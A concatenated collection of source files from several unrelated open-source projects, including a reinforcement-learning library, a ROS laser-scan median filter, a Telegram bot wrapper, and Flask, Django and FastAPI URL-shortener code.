observation, num_memory_steps, repeat=repeat
)
)
return chunked_observations
def merge_observations(trajectory, dim=0):
"""Concatenate observations and return a new observation."""
observation = trajectory[0]
for new_observation in trajectory[1:]:
observation = Observation(
*[
torch.cat((a, b), dim=dim) if a.dim() > 0 else a
for a, b in zip(observation, new_observation)
]
)
return observation
def flatten_observation(observation):
"""Flatten an observation by reshaping the time coordinates."""
#
def _flatten(tensor):
try:
return tensor.reshape(-1, tensor.shape[-1])
except IndexError:
return tensor
return map_observation(func=_flatten, observation=observation)
```
#### File: rllib/environment/abstract_environment.py
```python
from abc import ABCMeta, abstractmethod
from gym.spaces import Box
class AbstractEnvironment(object, metaclass=ABCMeta):
"""Interface for Environments.
Parameters
----------
dim_state: Tuple
dimension of state.
dim_action: Tuple
dimension of action.
observation_space: gym.env.Spaces
action_space: gym.env.Spaces
dim_observation: int, optional
dimension of observation.
num_observations: int, optional
number of discrete observations (None if observation is continuous).
num_actions: int, optional
number of discrete actions (None if action is continuous).
Methods
-------
step(action): next_state, reward, done, info
execute a step in the environment.
reset(): reset the environment.
"""
def __init__(
self,
dim_state,
dim_action,
observation_space,
action_space,
dim_observation=(-1,),
num_states=-1,
num_actions=-1,
num_observations=-1,
dim_reward=(1,),
):
super().__init__()
self.dim_action = dim_action
self.dim_state = dim_state
self.num_actions = num_actions if num_actions is not None else -1
self.num_observations = num_observations if num_observations is not None else -1
self.num_states = num_states if num_states is not None else -1
if dim_observation == (-1,):
dim_observation = dim_state
self.dim_observation = dim_observation
self.action_space = action_space
self.observation_space = observation_space
self.discrete_state = self.num_states >= 0
self.discrete_action = self.num_actions >= 0
self.discrete_observation = self.num_observations >= 0
self.dim_reward = dim_reward
self.metadata = {"render.modes": []}
def __str__(self):
"""Return string that explains environment."""
if self.discrete_state:
state_str = f"{self.num_states} discrete states"
else:
state_str = f"{self.dim_state} continuous states"
if self.discrete_action:
action_str = f"{self.num_actions} discrete actions"
else:
action_str = f"{self.dim_action} continuous actions"
return f"{self.name}, {state_str}, {action_str}."
@abstractmethod
def step(self, action):
"""Run one time-step of the model dynamics.
Parameters
----------
action: ndarray
Returns
-------
observation: ndarray
reward: float
done: bool
info: dict
"""
raise NotImplementedError
@abstractmethod
def reset(self):
"""Reset the state of the model and returns an initial observation.
Returns
-------
observation: ndarray
"""
raise NotImplementedError
def render(self, mode="human"):
"""Render the environment.
The set of supported modes varies per environment. (And some
environments do not support rendering at all.) By convention,
if mode is:
- human: render to the current display or terminal and
return nothing. Usually for human consumption.
- rgb_array: Return an numpy.ndarray with shape (x, y, 3),
representing RGB values for an x-by-y pixel image, suitable
for turning into a video.
- ansi: Return a string (str) or StringIO.StringIO containing a
terminal-style text representation. The text can include newlines
and ANSI escape sequences (e.g. for colors).
Parameters
----------
mode: str.
The mode to render with
Note
----
Make sure that your class's metadata 'render.modes' key includes
the list of supported modes. It's recommended to call super()
in implementations to use the functionality of this method.
"""
pass
def close(self):
"""Override close in your subclass to perform any necessary cleanup.
Environments will automatically close() themselves when
garbage collected or when the program exits.
"""
pass
@property
def action_scale(self):
"""Return the action scale of the environment."""
if self.discrete_action:
return 1
elif isinstance(self.action_space, Box):
return 1 / 2 * (self.action_space.high - self.action_space.low)
else:
raise NotImplementedError
@property
def goal(self):
"""Return current goal of environment."""
return None
@property # type: ignore
@abstractmethod
def state(self):
"""Return current state of environment."""
raise NotImplementedError
@state.setter # type: ignore
@abstractmethod
def state(self, value):
raise NotImplementedError
@property
@abstractmethod
def time(self):
"""Return current time of environment."""
raise NotImplementedError
@property
def name(self):
"""Return class name."""
return self.__class__.__name__
class EnvironmentBuilder(object, metaclass=ABCMeta):
"""Abstract Environment Builder."""
@abstractmethod
def create_environment(self):
"""Create environment."""
raise NotImplementedError
def get_dynamical_model(self):
"""Get dynamical model."""
return None
def get_reward_model(self):
"""Get reward model."""
return None
def get_termination_model(self):
"""Get termination model."""
return None
```
#### File: environment/systems/abstract_system.py
```python
from abc import ABCMeta, abstractmethod
import numpy as np
from gym import spaces
class AbstractSystem(object, metaclass=ABCMeta):
"""Interface for physical systems with continuous state-action spaces.
Parameters
----------
dim_state: Tuple
dim_action: Tuple
dim_observation: Tuple, optional
Methods
-------
state: ndarray
return the current state of the system.
time: int or float
return the current time step.
reset(state):
reset the state.
step(action): ndarray
execute a one step simulation and return the next state.
"""
def __init__(self, dim_state, dim_action, dim_observation=None):
super().__init__()
self.dim_state = dim_state
self.dim_action = dim_action
if dim_observation is None:
dim_observation = dim_state
self.dim_observation = dim_observation
self._time = 0
@property # type: ignore
@abstractmethod
def state(self):
"""Return the state of the system."""
raise NotImplementedError
@state.setter # type: ignore
@abstractmethod
def state(self, value):
raise NotImplementedError
@property
def time(self):
"""Return the current time of the system."""
return self._time
@abstractmethod
def step(self, action):
"""Do a one step ahead simulation of the system.
x' = f(x, action)
Parameters
----------
action: ndarray
Returns
-------
next_state: ndarray
"""
raise NotImplementedError
@abstractmethod
def reset(self, state):
"""Reset system and set state to `state'.
Parameters
----------
state: ndarray
"""
raise NotImplementedError
def render(self, mode="human"):
"""Render system."""
pass
@property
def action_space(self):
"""Return action space."""
return spaces.Box(
np.array([-1] * self.dim_action[0]), np.array([1] * self.dim_action[0])
)
@property
def observation_space(self):
"""Return observation space."""
return spaces.Box(
np.array([-1] * self.dim_observation[0]),
np.array([1] * self.dim_observation[0]),
)
```
#### File: environment/vectorized/util.py
```python
from abc import ABCMeta
import numpy as np
from gym import Env
from rllib.util.utilities import get_backend
class VectorizedEnv(Env, metaclass=ABCMeta):
"""Vectorized implementation of Acrobot."""
@property
def bk(self):
"""Get current backend of environment."""
return get_backend(self.state)
@property
def state(self):
"""Return the state of the system."""
return self._state
@state.setter
def state(self, value):
self._state = value
def set_state(self, state):
"""Set vectorized state."""
self.state = state
def get_state(self):
"""Set vectorized state."""
return self.state
def atan2(self, sin, cos):
"""Return signed angle of the sin cosine."""
if self.bk is np:
return self.bk.arctan2(sin, cos)
else:
return self.bk.atan2(sin, cos)
def clip(self, val, min_val, max_val):
"""Clip between min and max values."""
if self.bk is np:
return self.bk.clip(val, min_val, max_val)
else:
return self.bk.clamp(val, min_val, max_val)
def cat(self, arrays, axis=-1):
"""Concatenate arrays along an axis."""
if self.bk is np:
return np.append(*arrays, axis)
else:
return self.bk.cat(arrays, axis)
def unsqueeze(self, array, axis=-1):
"""Unsqueeze array along axis."""
if self.bk is np:
return np.expand_dims(array, axis=axis)
else:
return array.unsqueeze(dim=axis)
def rand(self, min_val, max_val):
"""Return random number between min_val and max_val."""
if self.bk is np:
return np.random.randn() * (max_val - min_val) + min_val
else:
return self.bk.rand(min_val, max_val)
def step(self, action):
"""Run one timestep of the environment's dynamics.
When end of episode is reached, you are responsible for calling `reset()` to
reset this environment's state.
Accepts an action and returns a tuple (observation, reward, done, info).
Parameters
----------
action: np.ndarray
An action provided by the agent.
Returns
-------
observation: np.ndarray
Agent's observation of the current environment.
reward: float
Amount of reward returned after previous action.
done: bool
Whether the episode has ended.
info: dict
Contains auxiliary diagnostic information.
"""
raise NotImplementedError
def rk4(derivs, y0, t, *args, **kwargs):
"""Integrate 1D or ND system of ODEs using 4-th order Runge-Kutta.
This is a toy implementation which may be useful if you find
yourself stranded on a system w/o scipy. Otherwise use
:func:`scipy.integrate`.
*y0*
initial state vector
*t*
sample times
*derivs*
returns the derivative of the system and has the
signature ``dy = derivs(yi, ti)``
*args*
additional arguments passed to the derivative function
*kwargs*
additional keyword arguments passed to the derivative function
Example 1 ::
## 2D system
def derivs6(x,t):
d1 = x[0] + 2*x[1]
d2 = -3*x[0] + 4*x[1]
return (d1, d2)
dt = 0.0005
t = arange(0.0, 2.0, dt)
y0 = (1,2)
yout = rk4(derivs6, y0, t)
Example 2::
## 1D system
alpha = 2
def derivs(x,t):
return -alpha*x + exp(-t)
y0 = 1
yout = rk4(derivs, y0, t)
If you have access to scipy, you should probably be using the
scipy.integrate tools rather than this function.
"""
bk = get_backend(y0)
yout = bk.zeros((len(t), *y0.shape))
yout[0] = y0
for i in np.arange(len(t) - 1):
thist = t[i]
dt = t[i + 1] - thist
dt2 = dt / 2.0
y0 = yout[i]
k1 = derivs(y0, thist, *args, **kwargs)
k2 = derivs(y0 + dt2 * k1, thist + dt2, *args, **kwargs)
k3 = derivs(y0 + dt2 * k2, thist + dt2, *args, **kwargs)
k4 = derivs(y0 + dt * k3, thist + dt, *args, **kwargs)
yout[i + 1] = y0 + dt / 6.0 * (k1 + 2 * k2 + 2 * k3 + k4)
return yout
```
#### File: rllib/policy/random_policy.py
```python
from rllib.util.neural_networks.utilities import get_batch_size
from .abstract_policy import AbstractPolicy
class RandomPolicy(AbstractPolicy):
"""Random Policy implementation of AbstractPolicy base class.
This policy will always return a centered distribution with a unit scaling.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
def forward(self, state):
"""Get distribution over actions."""
batch_size = get_batch_size(state, self.dim_state)
if batch_size:
return self.random(batch_size)
else:
return self.random()
```
#### File: rllib/util/input_transformations.py
```python
from abc import ABC, abstractmethod
class AbstractTransform(ABC):
"""Abstract Transformation definition."""
extra_dim: int
@abstractmethod
def __call__(self, state):
"""Apply transformation."""
raise NotImplementedError
class ComposeTransforms(AbstractTransform):
"""Compose a list of transformations."""
def __init__(self, transforms):
super().__init__()
self.extra_dim = 0
for transform in transforms:
self.extra_dim += transform.extra_dim
self.transforms = transforms
def __call__(self, x):
"""Apply sequence of transformations."""
for transform in self.transforms:
x = transform(x)
return x
```
#### File: rllib/value_function/model_based_q_function.py
```python
import torch
from rllib.algorithms.simulation_algorithm import SimulationAlgorithm
from rllib.dataset.utilities import stack_list_of_tuples
from rllib.util.neural_networks.utilities import DisableGradient, unfreeze_parameters
from rllib.util.utilities import RewardTransformer
from rllib.util.value_estimation import mc_return
from .abstract_value_function import AbstractQFunction
from .integrate_q_value_function import IntegrateQValueFunction
class ModelBasedQFunction(AbstractQFunction):
"""Q function that arises from simulating the model.
Parameters
----------
policy: AbstractPolicy.
Policy with which to rollout the model.
value_function: AbstractValueFunction, optional.
Value function with which to bootstrap the value estimate.
gamma: float, optional (default=1.0).
Discount factor.
entropy_regularization: float, optional (default=0.0).
Entropy regularization for rewards.
reward_transformer: RewardTransformer, optional.
Reward transformer module.
"""
def __init__(
self,
dynamical_model,
reward_model,
num_model_steps=1,
num_particles=15,
termination_model=None,
policy=None,
value_function=None,
gamma=1.0,
lambda_=1.0,
reward_transformer=RewardTransformer(),
entropy_regularization=0.0,
*args,
**kwargs,
):
super().__init__(
dim_state=value_function.dim_state,
dim_action=dynamical_model.dim_action,
*args,
**kwargs,
)
self.simulator = SimulationAlgorithm(
dynamical_model=dynamical_model,
reward_model=reward_model,
num_model_steps=num_model_steps,
num_particles=num_particles,
termination_model=termination_model,
)
assert num_model_steps > 0, "At least one-step ahead simulation."
if policy is None:
assert (
num_model_steps == 1
), "If no policy is passed, then only one-step ahead."
self.value_function = value_function
self.lambda_ = lambda_
self.policy = policy
self.gamma = gamma
self.reward_transformer = reward_transformer
self.entropy_regularization = entropy_regularization
def set_policy(self, new_policy):
"""Set policy."""
self.policy = new_policy
try:
self.value_function.set_policy(new_policy)
except AttributeError:
pass
def forward(self, state, action=torch.tensor(float("nan"))):
"""Get value at a given state-(action) through simulation.
Parameters
----------
state: Tensor.
State where to evaluate the value.
action: Tensor, optional.
First action of simulation.
"""
unfreeze_parameters(self.policy)
with DisableGradient(
self.simulator.dynamical_model,
self.simulator.reward_model,
self.simulator.termination_model,
):
sim_trajectory = self.simulator.simulate(state, self.policy, action)
sim_observation = stack_list_of_tuples(sim_trajectory, dim=state.ndim - 2)
if isinstance(self.value_function, IntegrateQValueFunction):
cm = DisableGradient(self.value_function.q_function)
else:
cm = DisableGradient(self.value_function)
with cm:
v = mc_return(
sim_observation,
gamma=self.gamma,
lambda_=self.lambda_,
value_function=self.value_function,
reward_transformer=self.reward_transformer,
entropy_regularization=self.entropy_regularization,
reduction="none",
)
v = v.reshape(
self.simulator.num_particles, # num particles.
state.shape[0], # batch shape
1, # time coordinate.
self.simulator.reward_model.dim_reward[0], # dim_reward
-1, # possible ensemble dimension.
).mean(0)
v = v[..., 0] # In cases of ensembles return first component.
return v
``` |
{
"source": "4ku/flaskProject",
"score": 2
} |
#### File: app/dynamic_fields/models.py
```python
from app import db
class Text_field(db.Model):
id = db.Column(db.Integer, primary_key=True)
data = db.Column(db.Unicode(255))
media_id = db.Column(db.Integer, db.ForeignKey('media.id'))
media = db.relationship("Media", single_parent=True, uselist=False,
backref=db.backref("text", uselist=False,cascade="all, delete, delete-orphan"))
class TextArea_field(db.Model):
id = db.Column(db.Integer, primary_key=True)
data = db.Column(db.Unicode(255))
media_id = db.Column(db.Integer, db.ForeignKey('media.id'))
media = db.relationship("Media", single_parent=True, uselist=False,
backref=db.backref("textArea", uselist=False,cascade="all, delete, delete-orphan"))
class Date_field(db.Model):
id = db.Column(db.Integer, primary_key=True)
data = db.Column(db.DateTime())
media_id = db.Column(db.Integer, db.ForeignKey('media.id'))
media = db.relationship("Media", single_parent=True, uselist=False,
backref=db.backref("date", uselist=False,cascade="all, delete, delete-orphan"))
class Link_field(db.Model):
id = db.Column(db.Integer, primary_key=True)
data = db.Column(db.Unicode(255))
media_id = db.Column(db.Integer, db.ForeignKey('media.id'))
media = db.relationship("Media", single_parent=True, uselist=False,
backref=db.backref("link", uselist=False,cascade="all, delete, delete-orphan"))
class Picture_field(db.Model):
id = db.Column(db.Integer, primary_key=True)
data = db.Column(db.Unicode(255))
encrypted_filename = db.Column(db.Unicode(255))
media_id = db.Column(db.Integer, db.ForeignKey('media.id'))
media = db.relationship("Media", single_parent=True, uselist=False,
backref=db.backref("picture", uselist=False,cascade="all, delete, delete-orphan"))
class File_field(db.Model):
id = db.Column(db.Integer, primary_key=True)
data = db.Column(db.Unicode(255))
encrypted_filename = db.Column(db.Unicode(255))
file_type = db.Column(db.Unicode(30))
media_id = db.Column(db.Integer, db.ForeignKey('media.id'))
media = db.relationship("Media", single_parent=True, uselist=False,
backref=db.backref("file", uselist=False,cascade="all, delete, delete-orphan"))
class Number_field(db.Model):
id = db.Column(db.Integer, primary_key=True)
data = db.Column(db.Float)
media_id = db.Column(db.Integer, db.ForeignKey('media.id'))
media = db.relationship("Media", single_parent=True, uselist=False,
backref=db.backref("number", uselist=False,cascade="all, delete, delete-orphan"))
class Categorical_values(db.Model):
id = db.Column(db.Integer, primary_key=True)
value = db.Column(db.Unicode(255))
category_id = db.Column(db.Integer, db.ForeignKey('categorical_field.id'))
field = db.relationship("Categorical_field", single_parent=True, foreign_keys=[category_id],
backref=db.backref("values",cascade="all, delete, delete-orphan"))
class Categorical_field(db.Model):
id = db.Column(db.Integer, primary_key=True)
media_id = db.Column(db.Integer, db.ForeignKey('media.id'))
media = db.relationship("Media", single_parent=True, uselist=False,
backref=db.backref("category", uselist=False,cascade="all, delete, delete-orphan"))
selected_value = db.Column(db.Unicode(255))
class Media(db.Model):
id = db.Column(db.Integer, primary_key=True)
def default_order_value():
return Fields.query.count()
class Fields(db.Model):
id = db.Column(db.Integer, primary_key=True)
label = db.Column(db.Unicode(64))
media_id = db.Column(db.Integer, db.ForeignKey('media.id'))
media = db.relationship("Media", backref=db.backref("field", uselist=False, order_by="Fields.order"))
display = db.Column(db.Boolean, unique=False, default=True)
order = db.Column(db.Integer, default = default_order_value, nullable = False)
```
#### File: flaskProject/app/__init__.py
```python
from flask import Flask, request
from flask_sqlalchemy import SQLAlchemy
from flask_migrate import Migrate
from flask_login import LoginManager
from flask_moment import Moment
from flask_session import Session
from flask import session
from flask_babel import Babel
from config import Config
from datetime import datetime
from jinja2 import ChoiceLoader, FileSystemLoader
import logging
from logging.handlers import SMTPHandler
from logging.handlers import RotatingFileHandler
import os
app = Flask(__name__)
app.config.from_object(Config)
db = SQLAlchemy(app)
db.create_all()
db.session.commit()
migrate = Migrate(app, db)
babel = Babel(app)
moment = Moment(app)
session_ = Session(app)
login = LoginManager(app)
login.session_protection = "strong"
login.login_view = 'auth.login'
# Blueprints - подгрузка модулей, которые находятся в папках auth, sections и tasks
from app.auth import bp as auth_bp
from app.sections import bp as sections_bp
from app.tasks import bp as tasks_bp
from app.users import bp as users_bp
app.register_blueprint(auth_bp)
app.register_blueprint(sections_bp, url_prefix = "/sections")
app.register_blueprint(tasks_bp, url_prefix = "/tasks")
app.register_blueprint(users_bp)
# Добавим путь для шаблонов динамических полей
loader = FileSystemLoader("app/dynamic_fields/templates/")
my_loader = ChoiceLoader([
app.jinja_loader, loader ])
app.jinja_loader = my_loader
# Функция load_user необходима для LoginManager
from app.models import Users
@login.user_loader
def load_user(id):
return Users.query.get(int(id))
# Добавляем список языков и функцию сейчашнего времени в глобальные
# переменные jinja, чтобы их можно было использовать в шаблонах
app.jinja_env.globals.update(now = datetime.utcnow)
app.jinja_env.globals['LANGUAGES'] = app.config['LANGUAGES']
# Получение текущего языка
@babel.localeselector
def get_locale():
if "CURRENT_LANGUAGE" in session:
return session["CURRENT_LANGUAGE"]
return request.accept_languages.best_match(app.config['LANGUAGES'])
from app import routes, models, errors_handling
```
#### File: app/users/forms.py
```python
from flask_babel import _, lazy_gettext as _l
from flask_wtf import FlaskForm
from wtforms.validators import ValidationError, DataRequired, Email
from app.models import Users
from wtforms import Form, StringField, SubmitField, SelectField
from flask_wtf.file import FileField, FileAllowed
class EditProfileForm_Admin(FlaskForm):
email = StringField(_l('Email'), validators=[DataRequired(), Email()])
role_list = SelectField(_l('Role'),
choices=[('Admin',_l('Admin')),('Usual',_l('Usual user')),('Not confirmed',_l('Not confirmed'))])
picture = FileField(_l('Update Profile Picture'), validators=[FileAllowed(['jpg', 'png','jpeg'])])
submit = SubmitField(_l('Submit'))
def __init__(self, original_email, *args, **kwargs):
super(EditProfileForm_Admin, self).__init__(*args, **kwargs)
self.original_email = original_email
def validate_email(self, email):
if email.data != self.original_email:
user = Users.query.filter_by(email=self.email.data).first()
if user is not None:
raise ValidationError(_l('Please use a different email.'))
class EditProfileForm(FlaskForm):
picture = FileField(_l('Update Profile Picture'), validators=[FileAllowed(['jpg', 'png','jpeg'])])
submit = SubmitField(_l('Submit'))
``` |
{
"source": "4kuma/synapsi_internship",
"score": 4
} |
#### File: 4kuma/synapsi_internship/task2.py
```python
from random import randint
def main():
min_value = 1
max_value = 0
while min_value > max_value:
min_value = randint(0, 150)
max_value = randint(75, 200)
while True:
user_input = input(f'Input number in range {min_value} - {max_value}\n')
try:
n = int(user_input)
if n < min_value:
print(f'Input number is lesser than min value!!!\n')
elif n > max_value:
print(f'Input number is greater than max value!!!\n')
else:
input_value = n
break
except ValueError:
print("Input is in wrong format!!!\n")
if __name__ == '__main__':
main()
``` |
{
"source": "4l3x7/sayhello",
"score": 2
} |
#### File: sayhello/sayhello/errors.py
```python
from flask import render_template
from sayhello import app
@app.errorhandler(404)
def page_not_found(): #removed e from ()
return render_template('errors/404.html'), 404
@app.errorhandler(500)
def internal_server_error(): #removed e from ()
return render_template('errors/500.html'), 500
``` |
{
"source": "4-legends/Software-for-robotics-rob599",
"score": 2
} |
#### File: rob599_hw3/scripts/median_filter.py
```python
import rospy
import math
import numpy as np
from sensor_msgs.msg import LaserScan
#######################################
# Laser Scan:
# Header: Seq, Stamp, frame_id
# Angle_min, Angle_max, Angle_Increment, Time_Increment
# Scan time, range_min, range_max, ranges, intensities
#######################################
class Laser_Filter:
def __init__(self):
#rospy.on_shutdown(self.save_csv)
self.laser_sub = rospy.Subscriber('/base_scan', LaserScan, self.laser_callback)
self.scan_pub = rospy.Publisher('/laser_scan', LaserScan, queue_size= 1)
def laser_callback(self, msg):
filtered_values = LaserScan()
distance = np.array(msg.ranges)
filtered_values.header = msg.header
filtered_values.angle_increment = msg.angle_increment
filtered_values.time_increment = msg.time_increment
filtered_values.scan_time = msg.scan_time
filtered_values.range_min = msg.range_min
filtered_values.range_max = msg.range_max
filtered_values.intensities = msg.intensities
angle = filtered_values.angle_increment
min_angle = msg.angle_min
max_angle = msg.angle_max
median_filter_size = rospy.get_param('median_filter_size')
if median_filter_size < 1:
median_filter_size = 1
elif median_filter_size > len(distance)/2 - 1:
median_filter_size = int(len(distance)/2 - 1)
filtered_values_ranges = np.zeros(len(distance))
for i in range(len(distance) - median_filter_size - 1):
if i < median_filter_size:
filtered_values_ranges[i] = 0
else:
filtered_values_ranges[i] = np.median(distance[(i - median_filter_size):(i + median_filter_size+1)])
if filtered_values_ranges[i] > msg.range_max or filtered_values_ranges[i] < 0:
filtered_values_ranges[i] = 0
filtered_values.ranges = filtered_values_ranges
filtered_values.angle_min = min_angle
filtered_values.angle_max = max_angle
self.scan_pub.publish(filtered_values)
if __name__ == '__main__':
rospy.init_node('median_filter', anonymous=True)
laser_filter = Laser_Filter()
try:
rospy.spin()
except KeyboardInterrupt:
print("Shutting down")
``` |
{
"source": "4lexandreC/telebotOrderbook",
"score": 3
} |
#### File: 4lexandreC/telebotOrderbook/telegramBot.py
```python
import requests
import json
import configparser as cfg
import telebot
##telegram bot class, without telebot you have to make the methods,
##init tele makes this class a bit useless
class telegramBot():
def __init__(self, config):
self.token = self.read_token(config)
self.base = "https://api.telegram.org/bot{}/".format(self.token)
def init_tele(self):
self.tbot = telebot.TeleBot(token=self.token)
def tele(self):
return self.tbot
## execute https://api.telegram.org/bot{token here}/getUpdates?timeout=100
def get_updates(self, offset=None):
url = self.base + "getUpdates?timeout=100"
if offset:
url = url + "&offset={}".format(offset + 1)
r = requests.get(url)
return json.loads(r.content)
def send_message(self, msg, chat_id):
url = self.base + "sendMessage?chat_id={}&text={}".format(chat_id, msg)
if msg is not None:
requests.get(url)
def read_token(self, config):
parser = cfg.ConfigParser()
parser.read(config)
return parser.get('creds', 'token')
``` |
{
"source": "4lexbit/url-manager-API",
"score": 2
} |
#### File: url-manager-API/urlman/views.py
```python
from django.shortcuts import get_object_or_404
from django.views.generic import RedirectView
from rest_framework import status
from rest_framework.generics import RetrieveDestroyAPIView, ListCreateAPIView, DestroyAPIView
from ipware import get_client_ip
from rest_framework.response import Response
from authentication.models import User
from .models import UrlItem, UrlViews
from .permissions import IsOwner
from .serializers import UrlItemListSerializer, UrlItemDetailSerializer, UrlViewsSerializer
class ClientRedirection(RedirectView):
permanent = False
def get_redirect_url(self, *args, **kwargs):
url = get_object_or_404(UrlItem, short_code=kwargs['short_code'])
client_ip, is_routable = get_client_ip(self.request)
UrlViews.objects.create(item=url, ip=client_ip)
return url.entered_url
class UrlList(ListCreateAPIView):
serializer_class = UrlItemListSerializer
permission_classes = (IsOwner,)
def get_queryset(self):
return UrlItem.objects.filter(owner=self.request.user)
def perform_create(self, serializer):
owner = get_object_or_404(User, id=self.request.user.id)
return serializer.save(owner=owner)
class UrlSingle(RetrieveDestroyAPIView):
serializer_class = UrlItemDetailSerializer
queryset = UrlItem.objects.all()
lookup_field = 'short_code'
permission_classes = (IsOwner,)
def destroy(self, request, *args, **kwargs):
instance = self.get_object()
self.perform_destroy(instance)
return Response('Successfully deleted', status=status.HTTP_204_NO_CONTENT)
class UrlViewDelete(DestroyAPIView):
serializer_class = UrlViewsSerializer
queryset = UrlViews.objects.all()
permission_classes = (IsOwner,)
def destroy(self, request, *args, **kwargs):
instance = self.get_object()
self.perform_destroy(instance)
return Response('Successfully deleted', status=status.HTTP_204_NO_CONTENT)
``` |
{
"source": "4lexbit/url-manager-backend",
"score": 2
} |
#### File: db/models/__init__.py
```python
import pkgutil
from pathlib import Path
from urlman.db.models.transition import TransitionModel
from urlman.db.models.urls import UrlModel
from urlman.db.models.user import UserModel
def load_all_models() -> None:
"""Load all models from this folder."""
package_dir = Path(__file__).resolve().parent
modules = pkgutil.walk_packages(
path=[str(package_dir)],
prefix="urlman.db.models.",
)
for module in modules:
__import__(module.name)
__all__ = [
"UrlModel",
"UserModel",
"TransitionModel",
"load_all_models",
]
```
#### File: urls/repos/selectors.py
```python
from typing import List, Optional
from sqlalchemy import select
from sqlalchemy.ext.asyncio import AsyncSession
from sqlalchemy.orm import joinedload
from starlette.requests import Request
from urlman.db.models import UrlModel
from urlman.db.models.user import UserModel
async def get_shorted_url_by_id(
*,
url_id: str,
child: bool = False,
session: AsyncSession,
) -> Optional[UrlModel]:
"""Get shorted url by id from db."""
if child:
stmt = select(UrlModel).where(
UrlModel.id == url_id,
UrlModel.is_deleted == False,
)
else:
stmt = (
select(UrlModel)
.where(
UrlModel.id == url_id,
UrlModel.is_deleted == False,
)
.options(
joinedload(UrlModel.transitions),
)
)
result = await session.execute(stmt)
return result.scalars().first()
async def get_url_by_shortcode(
url_shortcode: str,
session: AsyncSession,
) -> Optional[UrlModel]:
"""Get shorted url by shortcode from db."""
stmt = select(UrlModel).where(
UrlModel.short_code == url_shortcode,
UrlModel.is_deleted == False,
)
result = await session.execute(stmt)
return result.scalars().first()
async def get_list_shorted_urls(
user: UserModel,
session: AsyncSession,
) -> List[UrlModel]:
"""Get shorted urls of current user."""
stmt = select(UrlModel).where(
UrlModel.user == user,
UrlModel.is_deleted == False,
)
result = await session.execute(stmt)
return result.scalars().fetchall()
async def get_all_urls(session: AsyncSession) -> List[UrlModel]:
"""Get all shorted urls."""
stmt = select(UrlModel).order_by(UrlModel.created_at)
result = await session.execute(stmt)
return result.scalars().fetchall()
async def get_client_ip(request: Request) -> str:
"""Get client ip address from request."""
if "x-forwarded-for" in request.headers:
client_ip = request.headers.get("x-forwarded-for")
else:
client_ip = request.client.host
return client_ip
```
#### File: api/users/exceptions.py
```python
from fastapi import HTTPException
class UserNotFoundException(HTTPException):
"""Raised when user is not founded."""
def __init__(self) -> None:
super(UserNotFoundException, self).__init__(
status_code=404,
detail="User not found.",
)
class UserNotProvidedException(HTTPException):
"""Raised when user token is invalid."""
def __init__(self) -> None:
super(UserNotProvidedException, self).__init__(
status_code=401,
detail="User not provided.",
)
class UserCredentialsException(HTTPException):
"""Raised when users credentials are wrong."""
def __init__(self) -> None:
super(UserCredentialsException, self).__init__(
status_code=401,
detail="Could not validate credentials.",
headers={"WWW-Authenticate": "Bearer"},
)
class UserPasswordMismatchException(HTTPException):
"""Raised when password don't match."""
def __init__(self) -> None:
super(UserPasswordMismatchException, self).__init__(
status_code=400,
detail="Passwords don't match",
)
```
#### File: users/repos/selectors.py
```python
from typing import List, Optional
from fastapi import Depends
from fastapi.security import HTTPAuthorizationCredentials
from sqlalchemy import select
from sqlalchemy.ext.asyncio import AsyncSession
from sqlalchemy.orm import joinedload
from urlman.db.dependencies import get_db_session
from urlman.db.models import UserModel
from urlman.settings import settings
from urlman.web.api.auth import jwt_auth
from urlman.web.api.users.exceptions import (
UserCredentialsException,
UserNotProvidedException,
)
async def get_user_by_id(*, user_id: str, session: AsyncSession) -> Optional[UserModel]:
"""Get user by id(UUID) from db."""
stmt = (
select(UserModel)
.where(
UserModel.id == user_id,
)
.options(
joinedload(UserModel.urls),
)
)
result = await session.execute(stmt)
return result.scalars().first()
async def get_user_by_username(
*,
username: str,
session: AsyncSession,
) -> Optional[UserModel]:
"""Get user by username from db."""
stmt = select(UserModel).where(UserModel.username == username)
result = await session.execute(stmt)
return result.scalars().first()
async def get_users(*, session: AsyncSession) -> List[UserModel]:
"""Get all active user."""
stmt = (
select(UserModel)
.where(
UserModel.is_deleted == False,
)
.order_by(
UserModel.created_at,
)
)
result = await session.execute(stmt)
return result.scalars().fetchall()
async def get_all_users(*, session: AsyncSession) -> List[UserModel]:
"""Get all users from db."""
stmt = select(UserModel).order_by(UserModel.created_at)
result = await session.execute(stmt)
return result.scalars().fetchall()
async def get_current_user(
*,
token: HTTPAuthorizationCredentials = Depends(settings.auth_scheme),
session: AsyncSession = Depends(get_db_session),
) -> Optional[UserModel]:
"""Getting the current user."""
try:
username = jwt_auth.decode_token(token=token.credentials)
except Exception:
raise UserNotProvidedException()
user = await get_user_by_username(username=username, session=session)
if user is None:
raise UserCredentialsException()
return user
```
#### File: api/users/schemas.py
```python
import uuid
from typing import List, Optional
from pydantic import BaseModel, validate_email, validator
from urlman.web.api.urls.schemas import UrlOut
class UserOut(BaseModel):
"""Output User scheme."""
id: uuid.UUID
username: str
email: str
first_name: Optional[str] = None
last_name: Optional[str] = None
class Config:
title = "UserOutputScheme"
orm_mode = True
class UserExtended(UserOut):
"""Extended output User scheme."""
urls: List[UrlOut] = []
class Config:
title = "UserExtendedOutputScheme"
orm_mode = True
class UserIn(BaseModel):
"""Input User scheme."""
username: str
email: str
first_name: Optional[str] = None
last_name: Optional[str] = None
password: str
@validator("email")
def email_validation(cls, v):
"""Email validation."""
return validate_email(v)[1]
class Config:
title = "UserInputScheme"
orm_mode = True
schema_extra = {
"example": {
"username": "johndoe",
"email": "<EMAIL>",
"first_name": "John",
"last_name": "Doe",
"password": "<PASSWORD>",
},
}
class UserUpdate(UserIn):
"""Update User scheme."""
username: Optional[str] = None
email: Optional[str] = None
class Config:
title = "UserUpdateScheme"
class UserChangePassword(BaseModel):
"""Change user password scheme."""
password: str
new_password: Optional[str] = None
class Config:
title = "UserChangePasswordScheme"
schema_extra = {
"example": {
"password": "password",
"new_password": "<PASSWORD>",
},
}
class UserCredentials(BaseModel):
"""User credentials scheme."""
username: Optional[str] = None
password: Optional[str] = None
class Config:
title = "UserCredentialsScheme"
schema_extra = {
"example": {
"username": "johndoe",
"password": "<PASSWORD>",
},
}
```
#### File: api/users/views.py
```python
from fastapi import APIRouter, Depends, HTTPException
from fastapi_pagination import LimitOffsetPage, paginate
from sqlalchemy.exc import IntegrityError
from sqlalchemy.ext.asyncio import AsyncSession
from urlman.db.dependencies import get_db_session
from urlman.db.models import UserModel
from urlman.services.hashing import verify_password
from urlman.web.api.auth import jwt_auth
from urlman.web.api.auth.schemas import AccessToken
